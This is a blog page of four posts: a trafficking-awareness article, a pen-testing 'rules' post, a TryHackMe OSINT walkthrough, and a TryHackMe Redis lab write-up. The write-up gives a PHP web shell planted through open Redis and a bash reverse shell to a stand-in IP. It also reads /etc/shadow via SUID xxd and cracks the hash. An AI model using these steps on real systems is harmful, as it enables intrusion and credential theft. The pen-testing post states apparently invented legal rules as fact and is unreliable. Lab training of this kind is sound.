PORTFOLIO


  • Understanding The Background Pain Of Online Human Trafficking

    Understanding The Background Pain of Online Human Trafficking

    Technology, particularly the Internet, has enabled sex trafficking and sexual exploitation to become the fastest growing criminal activity in the world. The increasing misuse of technology is changing the nature of trafficking, so we must develop new ways to deal with it.

    The world of online technology and the Internet is helpful to traffickers, which is why we keep hearing different news every day. Online resources such as open and classified advertisement sites, adult websites, social media platforms and chatrooms, extending into the dark web, enable traffickers to interact with an increasing number of potential victims.


    According to reports on the Internet, Facebook is a huge market where things like this are done, and everyone has to bear the consequences. According to the Human Trafficking Institute, the 2020 Federal Human Trafficking Report revealed that 59 percent of online victim recruitment took place on Facebook.


    The report was released to mark the 20th anniversary of the Trafficking Victims Protection Act (TVPA), which made human trafficking a federal crime. This year's edition of the report highlights data and trends that span two decades of anti-trafficking enforcement in the U.S.

    You will have noticed that most crimes related to kidnapping are done offline, but in the world of the Internet, child exploitation and victim recruitment are happening very fast.

    People's habits have become so associated with Facebook, Snapchat and WeChat that even Instagram has been identified as a hotspot for sex trafficking cases.


     

     

    Actually, what is human trafficking?

    It is the illegal trade of human beings for the purposes of commercial sexual exploitation or reproductive slavery, or forced labour; nowadays it is also called modern-day slavery.

    Why does this happen?

    1) Because trafficking is a lucrative industry. It has been identified as the fastest growing criminal industry in the world.
    2) I guess unemployment, war and poverty are the key drivers of human trafficking.
    3) Homeless people, especially girls who run away from home, are at great risk of being targeted by a pimp (or traffickers) and becoming exploited.
    4) It is usually caused by poverty and a lack of economic opportunities, especially for women and children, and by a demand for certain services in the destination country.
    5) Traffickers use blackmail, abuse and threats to force victims to comply with their wishes in the destination country.

    Who are the victims?

    Generally females: young girls, and babies (who are born for the specific purpose of being sold). Age is the greatest vulnerability factor.

     

    According to a Google search, the top three states with the highest number of human trafficking incidents by number of cases reported are West Bengal, Rajasthan and Gujarat, and the top three states by crime rate are West Bengal, Daman and Diu, and Goa.


    The list is compiled from the 2016 Crime in India Report published by the National Crime Records Bureau (NCRB), Government of India.

    Indicators (observations):

    1) Wounds, bruises
    2) Drug addiction
    3) Hostility
    4) No eye contact
    5) Prepaid credit card or cell phone
    6) False or no identification
    7) Unable to provide the name of their school

    How can we stop that?

    It comes down to how we can stop it, because young people like us are going in the wrong direction somewhere, and the coming generation may ask us why it was not stopped at the right time; people may suffer for it later. See, every coin has two sides: the more we stop the thing, the more it will increase, so what we can do is make people aware, because there is a lack of awareness among people. According to a report, cybercrime or vulnerability lies more in the human mind than in our systems.


    1) This is not for promotion but for awareness: first of all, share this article with others.
    2) Organize a fundraiser to raise money and donate the proceeds to an anti-trafficking organization.
    3) The online world is very big, but if we see this type of content anywhere, then report it without hesitation. If you want to report anonymously, you can.
    4) If you have knowledge about cyber security, then you can make people aware of cyber security by doing videos, articles, seminars etc.
    5) Boycott products and companies that permit human trafficking.
    6) Learn the indicators of human trafficking so you can help identify a potential trafficking victim. Human trafficking awareness training is available for individuals, businesses, first responders, law enforcement, educators, and federal employees, among others.

    How to report?

    It is a little difficult to go against someone, but if you fight for the truth, or against such things which are hollowing out our society, then do not fear at all: you can report without hesitation, even anonymously, and you can make people aware by becoming a volunteer.

    National Cyber Crime Reporting Portal :- CLICK HERE

    Disclaimer

     

    All tutorials are for informational and educational purposes only and have been made using our own routers, servers, websites and other vulnerable free resources. They do not contain any illegal activity. We believe that ethical hacking, information security and cyber security should be familiar subjects to anyone using digital information and computers. Hacking Truth is against misuse of the information and we strongly suggest against it. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. We do not promote, encourage, support or excite any illegal activity or hacking.



      - Hacking Truth by Kumar Atul Jaiswal

     

  • The Hidden Agenda Of Companies Penetration Testing Rule

    The Hidden Agenda Of Companies Penetration Testing Rule


    So guys, today's blog is very important and informative. Today's topic is what actually happens in a real-life penetration test.

    There are so many rules and regulations for a beginner pen tester in a company. So in today's blog, I will share the steps which you have to follow while doing a pen test.

    What are the steps when you work in a real company as a pen tester? Read this blog till the end. Let's begin.

    Firstly, a proper agreement is made defining your scope, which states what you can do and what you can't.

    The company may specify that you can't use automated tools, and sometimes you have to exploit manually. There is no restriction on programming: you can write any program and use it.



    Now an interesting thing: if you run a pen testing company and are doing a pen testing engagement, your client can't change or deploy anything, and this is part of the rules. Suppose you have found all the vulnerabilities and made a proper report; the pen testing company will submit a red card to their client.

    This is basically a red certificate saying that they have completed the pen test and submitted the report. After that, the client has 30 days to fix all the vulnerabilities. When they get fixed, the client will inform the pen test company. The pen testing company will again test the client's server using the same methods as before. If all the vulnerabilities get patched, the pen test company will issue a green certificate.

    Now, let's come to rules. This is specifically for European countries. A GDPR list is there to measure the rate of all vulnerabilities, so if somehow employees' data gets leaked, the government will charge the company, and in case any critical vulnerabilities are found, the company will have to do a pen test again in 2 months. This rule is for European countries.

     



    Hope you remember I told you that once a pen test is done, the client has only 1 month to patch all the vulnerabilities. If the client doesn't respond in that time, and the pen test company finds a new bug on the 31st day, they will charge the client company. That's a rule too.

    Now, if a pen test is done and a bug is found within 3 months of the previous pen test, they can't submit it, otherwise they will face legal consequences, because if a new bug comes out within 3 months, it is considered that they knew about it but didn't disclose it. Thus legal problems can occur. There is a disclosure policy under which you cannot share any pen test report within 3 months. You cannot share anything regarding it. So many rules are there. It totally depends on the country and the company.

    Hope you liked today's blog and don't forget to share. You can't find this type of blog anywhere else; it's a very little-known topic. I would also like to give a big shoutout to Trident Security.




      - Hacking Truth by Kumar Atul Jaiswal



  • TryHackMe KaffeeSec - SoMeSINT


    In this room, you will be learning social media analysis and forensics. You will learn about google dorking, website archiving, social media enumeration/analysis, and the basic usage of OSINT techniques in the context of social media investigation. You don't need any previous knowledge of OSINT to do well in this room, but it definitely helps. I have included some resources in the "Resources" task at the bottom of the room that I encourage you to check out after completing this room!



    Prerequisites:


    Critical Thinking.
    A love of going deep into rabbit-holes.
    Basic understanding of Google.
    Python 3.7+





    Task 2 Story


    Background Information:


    You are Aleks Juulut, a private eye based out of Greenland. You don't usually work digitally, but have recently discovered OSINT techniques to make that aspect of your job much easier. You were recently hired by a mysterious person under the moniker "H" to investigate a suspected cheater, named Thomas Straussman.


    After a brief phone-call with his wife, Francesca Hodgerint, you've learned that he's been acting suspicious lately, but she isn't sure exactly what he could be doing wrong. She wants you to investigate him and report back anything you find. Unfortunately, you're out of the country on a family emergency and cannot get back to Greenland to meet the deadline of the investigation, so you're going to have to do all of it digitally. Good luck! 


    Answer the questions below


    1) Who hired you?

    Ans :- ks{H}


    2) Who are you investigating? (ks{firstname lastname})

    Ans :- ks{thomas straussman}





    Task 3 Let's get started!!


    Prerequisites:

    Patience, curiosity, and a passion for digging into rabbit holes.
    Firefox, Chrome, or another chromium-based browser (I recommend Brave).

    
    How exciting! Through talking to people who know Thomas, you've found out that he has a very guessable online handle: tstraussman. With this handle, we can find his social media accounts.

    
    The overall process for finding information from social media accounts starts with finding the social media accounts themselves. Finding social media accounts from names or emails can be automated through a process called enumeration. This is usually done with CLI tools or scripts, but you can get similar effects with google dorking. Here is a guide on google dorking, it's great reading material before you attempt this task and also includes a cheat-sheet that comes in handy.


    
    Before starting, I will preface this by saying the only places these accounts are found on are Twitter and Reddit. Please do not try to investigate further out-of-scope, as you will both meet a dead end and be snooping on accounts not involved with this CTF at all. I am not responsible for any actions/interactions made with an account outside of the sockpuppets created for this CTF. As a general rule, we're collecting PASSIVE information - there's no interacting directly with these accounts.



    Answer the questions below


    1) What is Thomas' favorite holiday?

    Ans :- Christmas



    It's mentioned in the bio as X-mas or Christmas.





    2) What is Thomas' birth date?

    Ans :- 12-20-1990


    His birthday is evident from his Reddit post.


     

    3) What is Thomas' fiancee's Twitter handle?

    Ans :- @fhodgelink



     

    Looking at his followers we can find the Twitter handle of his fiancée.
     

     

     

    4) What is Thomas' background picture of?

    Ans :- Buddha







     

     

    Task 4 Spider... what?


    Requirements:

        Spiderfoot
        Python 3


    First things first, make sure that you've downloaded the latest version of Python3. Then follow this guide to install the latest version of Spiderfoot (currently v3.3).






     

    Once it's installed correctly, run it by typing python3 sf.py -l 127.0.0.1:5001

    You can access the web interface by navigating to localhost:5001 in your browser.






    Click on "New Scan". In the "Scan Target" field, type in "Thomas Straussman" or "tstraussman"; then, under By Use Case, ensure that you checked the All option. Finally, press run. 



    Looking at the results, you can figure out which are false positives by filtering out anything that isn't related to Reddit or Twitter. 


    If you find a Twitter account that leads to shadowban.eu, click on the link.

    If you can't find anything related to Twitter, go to Settings --> Account Finder and set the highlighted option to False.








    1) What was the source module used to find these accounts?

    Ans :- sfp_accounts    

     


     

     

     

     

    2) Check the shadowban API. What is the value of "search"?

    Ans :- ks{1346173539712380929}






    Task 5 Connections, connections..

     

    Now that you have Thomas' Reddit and Twitter accounts, you can do some cool stuff!


    At this point, consider downloading a reverse search extension for your browser, my favorite is RevEye, which lets you choose from a handful of great reverse search engines, or use all of them simultaneously. Chrome / Firefox


    There are a few key types of information that we want to find from socials:

    • Images of places that contain clear identifiers like buildings, signs, monuments, or landmarks (for IMINT/GEOMINT purposes).
    • Clear images of the subject's face (for reverse image searches and possibly finding more accounts/sources of info).
    • Clear images of the subject in a group of people (family photos, friend groups, other information that can give context to their relationship with the group).
    • Personal information in their bio, or other personal data from their profile itself (where they grew up, currently live, went to school, etc.).
    • Relevant posts that may contain information on their whereabouts or personal habits (Do they smoke? Drink? Go to bars often? Love to vacation in specific places? All this information can help in an investigation.)


    Since you have gotten most useful information from Thomas' Twitter, it's time to "pivot" to his fiancee's account.

    What personal information can you find?



    NOTE: If you get stuck on the first flag, consider two things:


    • You can reverse image search landscapes / locations and most likely get a result.
    • You can look at the source of the website (ctrl + shift + c, then click on the image) and try to find some metadata from the image.



    Answer the questions below


    1) Where did Thomas and his fiancee vacation to?

    Ans :- Koblenz, Germany

     

     

    Fiancée's Twitter handle is @Fhodgelink (https://twitter.com/FHodgelink).
    It's pretty straightforward from the picture on her profile.

    The flag format is City, Country (7 letters, 7 letters), so it will be in the format "_______, Germany".

    Doing a reverse search of this image indicates it's Koblenz in Germany.




     

    2) When is Francesca's Mother's birthday? (without the year)

    Ans :- December 25th

     

     

    We can see it in one of her tweets.

     




    3) What is the name of their cat?

    Ans :- Gotank

     

     

    https://twitter.com/FHodgelink/status/1343023195855736837

     

     




    4) What show does Francesca like to watch?

    Ans :- 90 Day Fiancee




    One of her tweets shares the name of the program.



    Task 6 Turn back the clock!!


    Now that we've gathered intel from Thomas and Francesca's Twitters, let's move to another platform - Reddit.


    For the sake of this investigation, we're going to be using Reddit in two different ways:

    Use the old version (http://old.reddit.com/) for wayback machine purposes

    Use the new version (https://www.reddit.com/) for other purposes (later on)


    First, you're going to want to install the WayBackMachine extension for your browser (you don't need it, but it'll make your life much easier).


        Get it for Firefox
        Get it for Chrome
       

    Using Reddit's old site, navigate to Thomas' profile. Right click anywhere on the page and click on Wayback machine --> All Versions. You will see a calendar that shows all of the saved versions of the site, click through and take a look at each saved version (in this case there should be none).


    So it hasn't been saved yet... Nothing out of the ordinary, right?

    Next, go to Thomas' birthday post. Repeat the steps to find the first version of the site and..... Voila!


    We've discovered a coworker, which is another source of intel for us! But the question is... how much intel?
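The snapshot lookup the room has you do by hand (calendar view, then the capture nearest 21 Dec 2020) can also be done against the Wayback Machine's CDX index. This is an added example, not the room's or the blog's code; the CDX endpoint and its JSON row layout are real, the `fetch_captures` helper needs network access, and the sample response is constructed so everything else runs offline.

```python
"""Query the Wayback Machine CDX index for captures of a page and pick the
capture closest to a date of interest. Added example; the sample CDX body
below is constructed (only the 20210104143852 timestamp comes from the
archive URL quoted in this walkthrough)."""
import json
from datetime import datetime
from typing import Dict, List, Optional
from urllib.parse import urlencode
from urllib.request import urlopen

CDX_ENDPOINT = "https://web.archive.org/cdx/search/cdx"


def build_cdx_url(page_url: str) -> str:
    """CDX query returning timestamp, original URL and HTTP status for every
    successful (200) capture of page_url, as a JSON array of rows."""
    params = {
        "url": page_url,
        "output": "json",
        "fl": "timestamp,original,statuscode",
        "filter": "statuscode:200",
    }
    return f"{CDX_ENDPOINT}?{urlencode(params)}"


def parse_cdx_rows(body: str) -> List[Dict[str, str]]:
    """output=json gives a list of lists whose first row is the header."""
    rows = json.loads(body)
    if not rows:
        return []
    header, data = rows[0], rows[1:]
    return [dict(zip(header, row)) for row in data]


def snapshot_url(row: Dict[str, str]) -> str:
    """Replay URL for one capture, in the form the walkthrough quotes:
    https://web.archive.org/web/<timestamp>/<original>"""
    return f"https://web.archive.org/web/{row['timestamp']}/{row['original']}"


def closest_capture(rows: List[Dict[str, str]], target_date: str) -> Optional[Dict[str, str]]:
    """Capture whose timestamp is nearest (either side) to target_date,
    given as YYYY-MM-DD. Returns None when there are no captures."""
    if not rows:
        return None
    target = datetime.strptime(target_date, "%Y-%m-%d")
    return min(
        rows,
        key=lambda r: abs(datetime.strptime(r["timestamp"], "%Y%m%d%H%M%S") - target),
    )


def fetch_captures(page_url: str) -> List[Dict[str, str]]:
    """Live lookup (needs network); not exercised by the offline demo."""
    with urlopen(build_cdx_url(page_url), timeout=30) as resp:
        return parse_cdx_rows(resp.read().decode("utf-8"))


# Constructed sample response in the CDX output=json shape.
SAMPLE_CDX_BODY = json.dumps([
    ["timestamp", "original", "statuscode"],
    ["20201218093012", "https://old.reddit.com/user/minikhans", "200"],
    ["20210104143852", "https://old.reddit.com/user/minikhans", "200"],
    ["20210301120000", "https://old.reddit.com/user/minikhans", "200"],
])


if __name__ == "__main__":
    captures = parse_cdx_rows(SAMPLE_CDX_BODY)
    print(build_cdx_url("old.reddit.com/user/minikhans"))
    for cap in captures:
        print(snapshot_url(cap))
    best = closest_capture(captures, "2020-12-21")
    print("closest to 21 Dec 2020:", snapshot_url(best))
```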


    Answer the questions below


    1) What is the name of Thomas' coworker?

    Ans :- Hans Minik

     

     

    I got stuck at this stage. Finally I used the Wayback Machine to check the snapshot for 21st Dec 2020.



     

    2) Where does his coworker live?

    Ans :- Nuuk, Greenland

     

    Thomas lives in Nuuk, as per his profile

     

     

    Looking into Hans' Reddit profile, we can find the relevant posts.

     


     




    3) What is the paste ID for the link we found? (flag format)

    Ans :- ks{ww4ju}

     

    Hans' profile is https://web.archive.org/web/20210104143852/https://old.reddit.com/user/minikhans

     

     




    4) Password for the next link? (flag format)

    Ans :- ks{1qaz2wsx}

     

     


     




    5) What is the name of Thomas' mistress?

    Ans :- Emilia Moller

     

     

    Enter the password obtained in the previous step at the URL and the name will be shown.

     

     




    6) What is Thomas' Email address?

    Ans :- straussmanthom@mail.com




      - Hacking Truth by Kumar Atul Jaiswal



  • TryHackMe Res Redis pentesting Walkthrough

    TryHackMe is a platform that develops virtual classrooms which not only allow users to deploy training environments with the click of a button, but also reinforce learning by adding a question-answer approach. It's a comfortable experience to learn using pre-designed courses which include virtual machines (VMs) hosted in the cloud.


    While using a question-answer model does make learning easier, TryHackMe allows users to create their own virtual classrooms to teach particular topics enabling them to become teachers. This not only provides other users with rich and varied content, but also helps creators reinforce their understanding of fundamental concepts.
      



    Res is a new box on TryHackMe where you have to hack into a vulnerable database server with an in-memory data structure in this semi-guided challenge!


    Let's start off by scanning all ports using Nmap:


     

    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ sudo nmap -A -T4 -Pn  -sV -p- 10.10.43.113                                          130 ⨯
    [sudo] password for hackerboy: 
    Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
    Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-26 23:32 IST
    Nmap scan report for 10.10.43.113
    Host is up (0.22s latency).
    Not shown: 65533 closed ports
    PORT     STATE SERVICE VERSION
    80/tcp   open  http    Apache httpd 2.4.18 ((Ubuntu))
    |_http-server-header: Apache/2.4.18 (Ubuntu)
    |_http-title: Apache2 Ubuntu Default Page: It works
    6379/tcp open  redis   Redis key-value store 6.0.7
    No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
    
    Network Distance: 2 hops
    
    TRACEROUTE (using port 23/tcp)
    HOP RTT       ADDRESS
    1   224.93 ms 10.8.0.1
    2   225.08 ms 10.10.43.113
    
    OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
    Nmap done: 1 IP address (1 host up) scanned in 626.03 seconds
                                                                                                  
    ┌──(hackerboy㉿KumarAtulJaiswal)-[~]
    └─$ 
    
    
    






     

    Looking at the results we have an Apache web server running on port 80 and Redis 6.0.7 which is an in memory data structure store running on port 6379.


    Port 80: Apache Web Server:

    Let’s checkout the web server on port 80:

     

     

     


    OK, so we have the standard Apache landing page. Looking at the source code we can see nothing hidden. I ran a directory scan using Dirsearch to see whether I could find any hidden directories. Unfortunately no hidden directories can be found. Time to move on to port 6379 and enumerate Redis.

     

    Redis is not something I am familiar with so I spent some time Googling and found a good blog on enumerating Redis as below: 

     

     


     





    To start with we need to download redis-tools, so we can have access to redis-cli:

    sudo apt-get install redis-tools



    To start redis-tools, from the command line we enter:

    redis-cli -h [IP ADDRESS]


    By default Redis can be accessed without credentials. However, it can be configured to require a password only, or a username and password. In our case Redis can be accessed without any credentials. We can check this simply by entering the 'info' command.
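The same check, sending INFO over the wire and classifying the answer, written as a small RESP client so it can be run against your own instances without redis-cli. This is an added example, not the room's or the blog's code; the RESP framing and the -NOAUTH error are Redis' real protocol, `check_redis` needs network access, and the two sample replies are constructed so the parser runs offline.

```python
"""Detect a Redis instance that answers INFO without authentication.
Added example; SAMPLE_* replies are constructed (the 6.0.7 version string
matches the nmap banner in this walkthrough, the rest is illustrative)."""
import socket
from typing import Dict, Optional, Tuple


def encode_command(*args: str) -> bytes:
    """Serialise a command as a RESP array of bulk strings,
    e.g. INFO -> b'*1\\r\\n$4\\r\\nINFO\\r\\n'."""
    out = [f"*{len(args)}\r\n".encode()]
    for arg in args:
        raw = arg.encode()
        out.append(f"${len(raw)}\r\n".encode() + raw + b"\r\n")
    return b"".join(out)


def parse_reply(raw: bytes) -> Tuple[str, bytes]:
    """Decode one RESP reply into (kind, payload):
    '-' error, '+' simple string, '$' bulk string (length -1 is null)."""
    kind = chr(raw[0])
    if kind in "+-":
        return ("error" if kind == "-" else "status", raw[1:].split(b"\r\n", 1)[0])
    if kind == "$":
        header, rest = raw[1:].split(b"\r\n", 1)
        length = int(header)
        if length < 0:
            return ("null", b"")
        return ("bulk", rest[:length])
    raise ValueError(f"unsupported RESP type {kind!r}")


def parse_info(payload: bytes) -> Dict[str, str]:
    """INFO's payload is 'key:value' lines under '# Section' headers."""
    fields: Dict[str, str] = {}
    for line in payload.decode(errors="replace").splitlines():
        if line and not line.startswith("#") and ":" in line:
            key, value = line.split(":", 1)
            fields[key] = value
    return fields


def assess_info_reply(raw: bytes) -> Dict[str, Optional[str]]:
    """Classify an unauthenticated INFO reply: 'open' (no auth required,
    the state this box is in), 'protected' (requirepass/ACL in force),
    or 'error'/'unknown'."""
    kind, payload = parse_reply(raw)
    if kind == "error":
        text = payload.decode(errors="replace")
        state = "protected" if text.startswith("NOAUTH") else "error"
        return {"state": state, "version": None, "detail": text}
    if kind == "bulk":
        info = parse_info(payload)
        return {"state": "open", "version": info.get("redis_version"),
                "detail": f"role={info.get('role')} os={info.get('os')}"}
    return {"state": "unknown", "version": None, "detail": kind}


def check_redis(host: str, port: int = 6379, timeout: float = 5.0) -> Dict[str, Optional[str]]:
    """Live check (network): send INFO, read until the server stops
    sending, classify. Use only against hosts you are authorised to test."""
    with socket.create_connection((host, port), timeout=timeout) as sock:
        sock.sendall(encode_command("INFO"))
        chunks = []
        while True:
            try:
                data = sock.recv(65536)
            except socket.timeout:
                break
            if not data:
                break
            chunks.append(data)
    return assess_info_reply(b"".join(chunks))


# Constructed replies for the offline demo.
OPEN_INFO_BODY = b"# Server\r\nredis_version:6.0.7\r\nos:Linux\r\n# Replication\r\nrole:master\r\n"
SAMPLE_OPEN_REPLY = b"$" + str(len(OPEN_INFO_BODY)).encode() + b"\r\n" + OPEN_INFO_BODY + b"\r\n"
SAMPLE_PROTECTED_REPLY = b"-NOAUTH Authentication required.\r\n"

if __name__ == "__main__":
    for reply in (SAMPLE_OPEN_REPLY, SAMPLE_PROTECTED_REPLY):
        print(assess_info_reply(reply))
```

A 'protected' result means requirepass or an ACL is in force; an 'open' result on a reachable port is exactly the exposure the rest of this walkthrough builds on, and binding Redis to localhost (or a private interface) plus setting a password removes it.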


     

     


    From the above we can see that we have a potential username: vianka. From the Hack Tricks website we can see that we can gain RCE as follows:




    In firefox we can navigate to [IP-ADDRESS]/redis.php:

     



    We can see that redis.php does indeed run phpinfo().

    Let’s try this with another php script to run commands:


    <?php system($_GET['cmd']); ?>



    In redis-cli, we can simply overwrite the previous php file with this code and try RCE. 



     


    Let’s see if we can print out the contents of the passwd file on the Linux machine, it is best to change to ‘view-source’ to see the output:


     

     


    And there we go, we have the full contents of the /etc/passwd file on the screen and again we can see that we have a user vianka. All we need to do now is setup a listener and create a script to run a simple reverse php shell.

    To do this I will do the same as above in redis-cli, but we will set test to run the following php reverse shell script.



    "<?php exec("/bin/bash -c 'bash -i > /dev/tcp/YOUR_IP/4444 0>&1'"); ?>"




    One important point here is that we will need to escape the set test “….” quotes from the php shell script, so we will need to modify our shell code as follows:




    To capture the reverse shell I will start a Pwncat listener, as it has a great deal of functionality, a bit like meterpreter, in that we can easily upload and download files for further enumeration of the system, as well as run the built-in privesc scripts. 

     

     

     


    And we are in as user www-data. In the /home directory we can see user Vianka. Moving to Vianka’s home directory we can see that we have read access to the user.flag, so we can read the flag. 

     

     

     


    Wait here: basically I couldn't clear my terminal. If in your case it has been the same, don't worry, we are here to resolve this issue. Simply type this command and you will be able to clear your terminal.

     

    export TERM=xterm 

     



    The result shows a binary, xxd, with the SUID bit set and owned by root. We can probably exploit this to read a file with full root privileges. The go-to choice for Linux binary exploits is GTFOBins.

     



     


    We can list all files with the SUID bit set using this type of command:


    find / -perm -u=s -type f 2>/dev/null

     



    Unfortunately we do not have sudo rights, but looking at the info we can read a file as root, as the file has the SUID bit set. It may be possible to read the shadow file, extract the hash for user vianka and see if we can brute force the hash to get the password.

     

     

    Using this exploit we can print out the contents of the shadow file and copy Vianka's hash. If I can brute force the hash using John, we can simply su as user Vianka.

     

     


    Brute Forcing Vianka’s Hash with John:

    To do this we need to create two files, one with the contents of the passwd file and one with the hash of the shadow file, we only need to copy and paste the information for user Vianka. We can then use the ‘unshadow’ command to convert the hash to a format that is readable by John.

     


    echo "content" > local_passwd

    echo "content" > local_shadow

    unshadow local_passwd local_shadow > hash.txt


     

     


    john --format=sha512crypt --wordlist=/home/hackerboy/Documents/rockyou.txt hash.txt

     

     

     


    Now we have the password for user vianka, so we can simply 'su vianka' to change user to vianka:

     


     


    And there we have it, the root.txt file is there for the taking. I really enjoyed this box and it was good to learn about Redis, something I had not come across before.

     

     

     


      - Hacking Truth by Kumar Atul Jaiswal


     
